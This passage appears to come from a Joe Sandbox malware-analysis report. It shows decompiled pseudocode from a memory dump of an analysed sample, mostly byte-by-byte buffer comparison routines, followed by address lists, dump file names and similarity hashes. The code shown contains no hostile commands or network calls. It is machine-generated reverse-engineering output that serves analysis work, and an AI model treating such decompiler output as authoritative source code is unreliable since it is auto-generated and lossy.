									_t209 =  *(_t196 - 0xb);
									if(_t209 ==  *(_t200 - 0xb)) {
										_t291 = 0;
										L72:
										if(_t291 != 0) {
											goto L1;
										}
										_t210 =  *(_t196 - 7);
										if(_t210 ==  *(_t200 - 7)) {
											_t291 = 0;
											L83:
											if(_t291 != 0) {
												goto L1;
											}
											_t294 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t294 == 0) {
												L5:
												_t296 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t296 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t8 = (0 | _t197 > 0x00000000) - 1; // -1
														_t197 = (_t197 > 0) + _t8;
													}
													L2:
													return _t197;
												}
												_t215 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												if(_t215 != 0) {
													L86:
													_t197 = _t215;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t215 = (0 | _t294 > 0x00000000) + (0 | _t294 > 0x00000000) - 1;
											if(_t215 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t298 = (_t210 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t298 == 0) {
											L76:
											_t300 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t300 == 0) {
												L78:
												_t302 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t302 == 0) {
													L80:
													_t291 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t291 != 0) {
														_t189 = (0 | _t291 > 0x00000000) - 1; // -1
														_t291 = (_t291 > 0) + _t189;
													}
													goto L83;
												}
												_t183 = (0 | _t302 > 0x00000000) - 1; // -1
												_t291 = (_t302 > 0) + _t183;
												if(_t291 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t177 = (0 | _t300 > 0x00000000) - 1; // -1
											_t291 = (_t300 > 0) + _t177;
											if(_t291 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t171 = (0 | _t298 > 0x00000000) - 1; // -1
										_t291 = (_t298 > 0) + _t171;
										if(_t291 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t305 = (_t209 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t305 == 0) {
										L65:
										_t307 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t307 == 0) {
											L67:
											_t309 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t309 == 0) {
												L69:
												_t291 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t291 != 0) {
													_t164 = (0 | _t291 > 0x00000000) - 1; // -1
													_t291 = (_t291 > 0) + _t164;
												}
												goto L72;
											}
											_t158 = (0 | _t309 > 0x00000000) - 1; // -1
											_t291 = (_t309 > 0) + _t158;
											if(_t291 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t152 = (0 | _t307 > 0x00000000) - 1; // -1
										_t291 = (_t307 > 0) + _t152;
										if(_t291 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t146 = (0 | _t305 > 0x00000000) - 1; // -1
									_t291 = (_t305 > 0) + _t146;
									if(_t291 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t312 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t312 == 0) {
									L54:
									_t314 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t314 == 0) {
										L56:
										_t316 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t316 == 0) {
											L58:
											_t291 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t291 != 0) {
												_t139 = (0 | _t291 > 0x00000000) - 1; // -1
												_t291 = (_t291 > 0) + _t139;
											}
											goto L61;
										}
										_t133 = (0 | _t316 > 0x00000000) - 1; // -1
										_t291 = (_t316 > 0) + _t133;
										if(_t291 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t127 = (0 | _t314 > 0x00000000) - 1; // -1
									_t291 = (_t314 > 0) + _t127;
									if(_t291 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t121 = (0 | _t312 > 0x00000000) - 1; // -1
								_t291 = (_t312 > 0) + _t121;
								if(_t291 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t319 = (_t207 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L43:
								_t321 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L45:
									_t323 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L47:
										_t291 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t291 != 0) {
											_t113 = (0 | _t291 > 0x00000000) - 1; // -1
											_t291 = (_t291 > 0) + _t113;
										}
										goto L50;
									}
									_t107 = (0 | _t323 > 0x00000000) - 1; // -1
									_t291 = (_t323 > 0) + _t107;
									if(_t291 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t101 = (0 | _t321 > 0x00000000) - 1; // -1
								_t291 = (_t321 > 0) + _t101;
								if(_t291 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t95 = (0 | _t319 > 0x00000000) - 1; // -1
							_t291 = (_t319 > 0) + _t95;
							if(_t291 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t326 = (_t206 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t326 == 0) {
							L32:
							_t328 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t328 == 0) {
								L34:
								_t330 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t330 == 0) {
									L36:
									_t291 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t291 != 0) {
										_t88 = (0 | _t291 > 0x00000000) - 1; // -1
										_t291 = (_t291 > 0) + _t88;
									}
									goto L39;
								}
								_t82 = (0 | _t330 > 0x00000000) - 1; // -1
								_t291 = (_t330 > 0) + _t82;
								if(_t291 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t76 = (0 | _t328 > 0x00000000) - 1; // -1
							_t291 = (_t328 > 0) + _t76;
							if(_t291 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t70 = (0 | _t326 > 0x00000000) - 1; // -1
						_t291 = (_t326 > 0) + _t70;
						if(_t291 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t333 = (_t205 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t333 == 0) {
						L21:
						_t335 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t335 == 0) {
							L23:
							_t337 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t337 == 0) {
								L25:
								_t291 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t291 != 0) {
									_t63 = (0 | _t291 > 0x00000000) - 1; // -1
									_t291 = (_t291 > 0) + _t63;
								}
								goto L28;
							}
							_t57 = (0 | _t337 > 0x00000000) - 1; // -1
							_t291 = (_t337 > 0) + _t57;
							if(_t291 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t51 = (0 | _t335 > 0x00000000) - 1; // -1
						_t291 = (_t335 > 0) + _t51;
						if(_t291 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t45 = (0 | _t333 > 0x00000000) - 1; // -1
					_t291 = (_t333 > 0) + _t45;
					if(_t291 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t38 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t38;
								}
								goto L17;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t32 = __edx - 1; // -1
							__esi = __edx + _t32;
							if(__edx + _t32 != 0) {
								goto L1;
							}
							goto L14;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t26 = __edx - 1; // -1
						__esi = __edx + _t26;
						if(__edx + _t26 != 0) {
							goto L1;
						}
						goto L12;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t20 = __edx - 1; // -1
					__esi = __edx + _t20;
					if(__edx + _t20 != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t291;
				goto L2;
			}

0x004306f0
0x004306f0
0x004306f6
0x0043076e
0x00430770
0x00430772
0x00000000
0x00000000
0x00430778
0x0043077e
0x004307f5
0x004307f7
0x004307f9
0x00000000
0x00000000
0x004307ff
0x00430805
0x0043087c
0x0043087e
0x00430880
0x00000000
0x00000000
0x00430886
0x0043088c
0x00430903
0x00430905
0x00430907
0x00000000
0x00000000
0x00430913
0x0043098b
0x0043098d
0x0043098f
0x00000000
0x00000000
0x00430995
0x0043099b
0x00430a12
0x00430a14
0x00430a16
0x00000000
0x00000000
0x00430a1c
0x00430a22
0x00430a99
0x00430a9b
0x00430a9d
0x00000000
0x00000000
0x00430aab
0x00430aad
0x004306c8
0x004306d0
0x004306d2
0x004302e8
0x004302f0
0x004302f2
0x004302ff
0x004302ff
0x004302ff
0x0042ff30
0x00430bd4
0x00430bd4
0x004306df
0x004306e5
0x00430ac6
0x00430ac6
0x00000000
0x004306eb
0x00000000
0x004306eb
0x004306e5
0x00430aba
0x00430ac0
0x00000000
0x00000000
0x00000000
0x00430ac0
0x00430a2b
0x00430a2d
0x00430a42
0x00430a4a
0x00430a4c
0x00430a61
0x00430a69
0x00430a6b
0x00430a80
0x00430a88
0x00430a8a
0x00430a93
0x00430a93
0x00430a93
0x00000000
0x00430a8a
0x00430a74
0x00430a74
0x00430a7a
0x00000000
0x00000000
0x00000000
0x00430a7a
0x00430a55
0x00430a55
0x00430a5b
0x00000000
0x00000000
0x00000000
0x00430a5b
0x00430a36
0x00430a36
0x00430a3c
0x00000000
0x00000000
0x00000000
0x00430a3c
0x004309a4
0x004309a6
0x004309bb
0x004309c3
0x004309c5
0x004309da
0x004309e2
0x004309e4
0x004309f9
0x00430a01
0x00430a03
0x00430a0c
0x00430a0c
0x00430a0c
0x00000000
0x00430a03
0x004309ed
0x004309ed
0x004309f3
0x00000000
0x00000000
0x00000000
0x004309f3
0x004309ce
0x004309ce
0x004309d4
0x00000000
0x00000000
0x00000000
0x004309d4
0x004309af
0x004309af
0x004309b5
0x00000000
0x00000000
0x00000000
0x004309b5
0x0043091d
0x0043091f
0x00430934
0x0043093c
0x0043093e
0x00430953
0x0043095b
0x0043095d
0x00430972
0x0043097a
0x0043097c
0x00430985
0x00430985
0x00430985
0x00000000
0x0043097c
0x00430966
0x00430966
0x0043096c
0x00000000
0x00000000
0x00000000
0x0043096c
0x00430947
0x00430947
0x0043094d
0x00000000
0x00000000
0x00000000
0x0043094d
0x00430928
0x00430928
0x0043092e
0x00000000
0x00000000
0x00000000
0x0043092e
0x00430895
0x00430897
0x004308ac
0x004308b4
0x004308b6
0x004308cb
0x004308d3
0x004308d5
0x004308ea
0x004308f2
0x004308f4
0x004308fd
0x004308fd
0x004308fd
0x00000000
0x004308f4
0x004308de
0x004308de
0x004308e4
0x00000000
0x00000000
0x00000000
0x004308e4
0x004308bf
0x004308bf
0x004308c5
0x00000000
0x00000000
0x00000000
0x004308c5
0x004308a0
0x004308a0
0x004308a6
0x00000000
0x00000000
0x00000000
0x004308a6
0x0043080e
0x00430810
0x00430825
0x0043082d
0x0043082f
0x00430844
0x0043084c
0x0043084e
0x00430863
0x0043086b
0x0043086d
0x00430876
0x00430876
0x00430876
0x00000000
0x0043086d
0x00430857
0x00430857
0x0043085d
0x00000000
0x00000000
0x00000000
0x0043085d
0x00430838
0x00430838
0x0043083e
0x00000000
0x00000000
0x00000000
0x0043083e
0x00430819
0x00430819
0x0043081f
0x00000000
0x00000000
0x00000000
0x0043081f
0x00430787
0x00430789
0x0043079e
0x004307a6
0x004307a8
0x004307bd
0x004307c5
0x004307c7
0x004307dc
0x004307e4
0x004307e6
0x004307ef
0x004307ef
0x004307ef
0x00000000
0x004307e6
0x004307d0
0x004307d0
0x004307d6
0x00000000
0x00000000
0x00000000
0x004307d6
0x004307b1
0x004307b1
0x004307b7
0x00000000
0x00000000
0x00000000
0x004307b7
0x00430792
0x00430792
0x00430798
0x00000000
0x00000000
0x00000000
0x004306f8
0x004306f8
0x004306fc
0x00430700
0x00430702
0x00430717
0x00430717
0x0043071b
0x0043071f
0x00430721
0x00430736
0x00430736
0x0043073a
0x0043073e
0x00430740
0x00430755
0x00430755
0x00430759
0x0043075d
0x0043075f
0x00430761
0x00430768
0x00430768
0x00430768
0x00000000
0x0043075f
0x00430742
0x00430746
0x00430749
0x00430749
0x0043074f
0x00000000
0x00000000
0x00000000
0x0043074f
0x00430723
0x00430727
0x0043072a
0x0043072a
0x00430730
0x00000000
0x00000000
0x00000000
0x00430730
0x00430704
0x00430708
0x0043070b
0x0043070b
0x00430711
0x00000000
0x00000000
0x00000000
0x00430711
0x0042fb91
0x0042fb91
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 8280ec0daef6f37f1e8ae26d588cfc1f3581008ca8a103f9cb0c34e48d7cdee6
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: A3C19273E1B5B2099775452D543823FEF626E91B4035FC3B2DCD03F68AC22AAD059AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00430308 Relevance: .3, Instructions: 349
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00430308(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t200;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t205;
				signed int _t210;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t324;
				void* _t326;
				void* _t328;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t284 = 0;
					L15:
					if(_t284 != 0) {
						goto L1;
					}
					_t200 =  *(_t191 - 0x1a);
					if(_t200 ==  *(_t195 - 0x1a)) {
						_t284 = 0;
						L26:
						if(_t284 != 0) {
							goto L1;
						}
						_t201 =  *(_t191 - 0x16);
						if(_t201 ==  *(_t195 - 0x16)) {
							_t284 = 0;
							L37:
							if(_t284 != 0) {
								goto L1;
							}
							_t202 =  *(_t191 - 0x12);
							if(_t202 ==  *(_t195 - 0x12)) {
								_t284 = 0;
								L48:
								if(_t284 != 0) {
									goto L1;
								}
								_t203 =  *(_t191 - 0xe);
								if(_t203 ==  *(_t195 - 0xe)) {
									_t284 = 0;
									L59:
									if(_t284 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t284 = 0;
										L70:
										if(_t284 != 0) {
											goto L1;
										}
										_t205 =  *(_t191 - 6);
										if(_t205 ==  *(_t195 - 6)) {
											_t284 = 0;
											L81:
											if(_t284 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t287 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t287 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t8 = (0 | _t192 > 0x00000000) - 1; // -1
													_t192 = (_t192 > 0) + _t8;
												}
												goto L3;
											}
											_t210 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
											if(_t210 != 0) {
												_t192 = _t210;
												goto L3;
											}
											goto L4;
										}
										_t289 = (_t205 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t289 == 0) {
											L74:
											_t291 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t291 == 0) {
												L76:
												_t293 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t293 == 0) {
													L78:
													_t284 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t284 != 0) {
														_t182 = (0 | _t284 > 0x00000000) - 1; // -1
														_t284 = (_t284 > 0) + _t182;
													}
													goto L81;
												}
												_t176 = (0 | _t293 > 0x00000000) - 1; // -1
												_t284 = (_t293 > 0) + _t176;
												if(_t284 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t170 = (0 | _t291 > 0x00000000) - 1; // -1
											_t284 = (_t291 > 0) + _t170;
											if(_t284 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t164 = (0 | _t289 > 0x00000000) - 1; // -1
										_t284 = (_t289 > 0) + _t164;
										if(_t284 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t296 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t296 == 0) {
										L63:
										_t298 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t298 == 0) {
											L65:
											_t300 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t300 == 0) {
												L67:
												_t284 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t284 != 0) {
													_t157 = (0 | _t284 > 0x00000000) - 1; // -1
													_t284 = (_t284 > 0) + _t157;
												}
												goto L70;
											}
											_t151 = (0 | _t300 > 0x00000000) - 1; // -1
											_t284 = (_t300 > 0) + _t151;
											if(_t284 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t145 = (0 | _t298 > 0x00000000) - 1; // -1
										_t284 = (_t298 > 0) + _t145;
										if(_t284 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t139 = (0 | _t296 > 0x00000000) - 1; // -1
									_t284 = (_t296 > 0) + _t139;
									if(_t284 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t303 = (_t203 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t303 == 0) {
									L52:
									_t305 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t305 == 0) {
										L54:
										_t307 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t307 == 0) {
											L56:
											_t284 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t284 != 0) {
												_t131 = (0 | _t284 > 0x00000000) - 1; // -1
												_t284 = (_t284 > 0) + _t131;
											}
											goto L59;
										}
										_t125 = (0 | _t307 > 0x00000000) - 1; // -1
										_t284 = (_t307 > 0) + _t125;
										if(_t284 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t119 = (0 | _t305 > 0x00000000) - 1; // -1
									_t284 = (_t305 > 0) + _t119;
									if(_t284 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t113 = (0 | _t303 > 0x00000000) - 1; // -1
								_t284 = (_t303 > 0) + _t113;
								if(_t284 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t310 = (_t202 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t284 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t284 != 0) {
											_t106 = (0 | _t284 > 0x00000000) - 1; // -1
											_t284 = (_t284 > 0) + _t106;
										}
										goto L48;
									}
									_t100 = (0 | _t314 > 0x00000000) - 1; // -1
									_t284 = (_t314 > 0) + _t100;
									if(_t284 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t94 = (0 | _t312 > 0x00000000) - 1; // -1
								_t284 = (_t312 > 0) + _t94;
								if(_t284 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t88 = (0 | _t310 > 0x00000000) - 1; // -1
							_t284 = (_t310 > 0) + _t88;
							if(_t284 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t317 = (_t201 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t317 == 0) {
							L30:
							_t319 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t319 == 0) {
								L32:
								_t321 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t321 == 0) {
									L34:
									_t284 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t284 != 0) {
										_t81 = (0 | _t284 > 0x00000000) - 1; // -1
										_t284 = (_t284 > 0) + _t81;
									}
									goto L37;
								}
								_t75 = (0 | _t321 > 0x00000000) - 1; // -1
								_t284 = (_t321 > 0) + _t75;
								if(_t284 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t69 = (0 | _t319 > 0x00000000) - 1; // -1
							_t284 = (_t319 > 0) + _t69;
							if(_t284 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t63 = (0 | _t317 > 0x00000000) - 1; // -1
						_t284 = (_t317 > 0) + _t63;
						if(_t284 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t324 = (_t200 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t324 == 0) {
						L19:
						_t326 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t326 == 0) {
							L21:
							_t328 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t328 == 0) {
								L23:
								_t284 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t284 != 0) {
									_t56 = (0 | _t284 > 0x00000000) - 1; // -1
									_t284 = (_t284 > 0) + _t56;
								}
								goto L26;
							}
							_t50 = (0 | _t328 > 0x00000000) - 1; // -1
							_t284 = (_t328 > 0) + _t50;
							if(_t284 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t44 = (0 | _t326 > 0x00000000) - 1; // -1
						_t284 = (_t326 > 0) + _t44;
						if(_t284 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t38 = (0 | _t324 > 0x00000000) - 1; // -1
					_t284 = (_t324 > 0) + _t38;
					if(_t284 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t31 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t31;
								}
								goto L15;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t25 = __edx - 1; // -1
							__esi = __edx + _t25;
							if(__edx + _t25 != 0) {
								goto L1;
							}
							goto L12;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t19 = __edx - 1; // -1
						__esi = __edx + _t19;
						if(__edx + _t19 != 0) {
							goto L1;
						}
						goto L10;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t13 = __edx - 1; // -1
					__esi = __edx + _t13;
					if(__edx + _t13 != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t284;
				goto L3;
			}

0x00430308
0x00430308
0x0043030e
0x00430385
0x00430387
0x00430389
0x00000000
0x00000000
0x0043038f
0x00430395
0x0043040c
0x0043040e
0x00430410
0x00000000
0x00000000
0x00430416
0x0043041c
0x00430493
0x00430495
0x00430497
0x00000000
0x00000000
0x0043049d
0x004304a3
0x0043051a
0x0043051c
0x0043051e
0x00000000
0x00000000
0x00430524
0x0043052a
0x004305a1
0x004305a3
0x004305a5
0x00000000
0x00000000
0x004305b1
0x00430629
0x0043062b
0x0043062d
0x00000000
0x00000000
0x00430633
0x00430639
0x004306b0
0x004306b2
0x004306b4
0x00000000
0x00000000
0x004306c2
0x0042ff2e
0x0042ff30
0x00430bd4
0x00430bd4
0x004306d0
0x004306d2
0x004302e8
0x004302f0
0x004302f2
0x004302ff
0x004302ff
0x004302ff
0x00000000
0x004302f2
0x004306df
0x004306e5
0x00430ac6
0x00000000
0x00430ac6
0x00000000
0x004306eb
0x00430642
0x00430644
0x00430659
0x00430661
0x00430663
0x00430678
0x00430680
0x00430682
0x00430697
0x0043069f
0x004306a1
0x004306aa
0x004306aa
0x004306aa
0x00000000
0x004306a1
0x0043068b
0x0043068b
0x00430691
0x00000000
0x00000000
0x00000000
0x00430691
0x0043066c
0x0043066c
0x00430672
0x00000000
0x00000000
0x00000000
0x00430672
0x0043064d
0x0043064d
0x00430653
0x00000000
0x00000000
0x00000000
0x00430653
0x004305bb
0x004305bd
0x004305d2
0x004305da
0x004305dc
0x004305f1
0x004305f9
0x004305fb
0x00430610
0x00430618
0x0043061a
0x00430623
0x00430623
0x00430623
0x00000000
0x0043061a
0x00430604
0x00430604
0x0043060a
0x00000000
0x00000000
0x00000000
0x0043060a
0x004305e5
0x004305e5
0x004305eb
0x00000000
0x00000000
0x00000000
0x004305eb
0x004305c6
0x004305c6
0x004305cc
0x00000000
0x00000000
0x00000000
0x004305cc
0x00430533
0x00430535
0x0043054a
0x00430552
0x00430554
0x00430569
0x00430571
0x00430573
0x00430588
0x00430590
0x00430592
0x0043059b
0x0043059b
0x0043059b
0x00000000
0x00430592
0x0043057c
0x0043057c
0x00430582
0x00000000
0x00000000
0x00000000
0x00430582
0x0043055d
0x0043055d
0x00430563
0x00000000
0x00000000
0x00000000
0x00430563
0x0043053e
0x0043053e
0x00430544
0x00000000
0x00000000
0x00000000
0x00430544
0x004304ac
0x004304ae
0x004304c3
0x004304cb
0x004304cd
0x004304e2
0x004304ea
0x004304ec
0x00430501
0x00430509
0x0043050b
0x00430514
0x00430514
0x00430514
0x00000000
0x0043050b
0x004304f5
0x004304f5
0x004304fb
0x00000000
0x00000000
0x00000000
0x004304fb
0x004304d6
0x004304d6
0x004304dc
0x00000000
0x00000000
0x00000000
0x004304dc
0x004304b7
0x004304b7
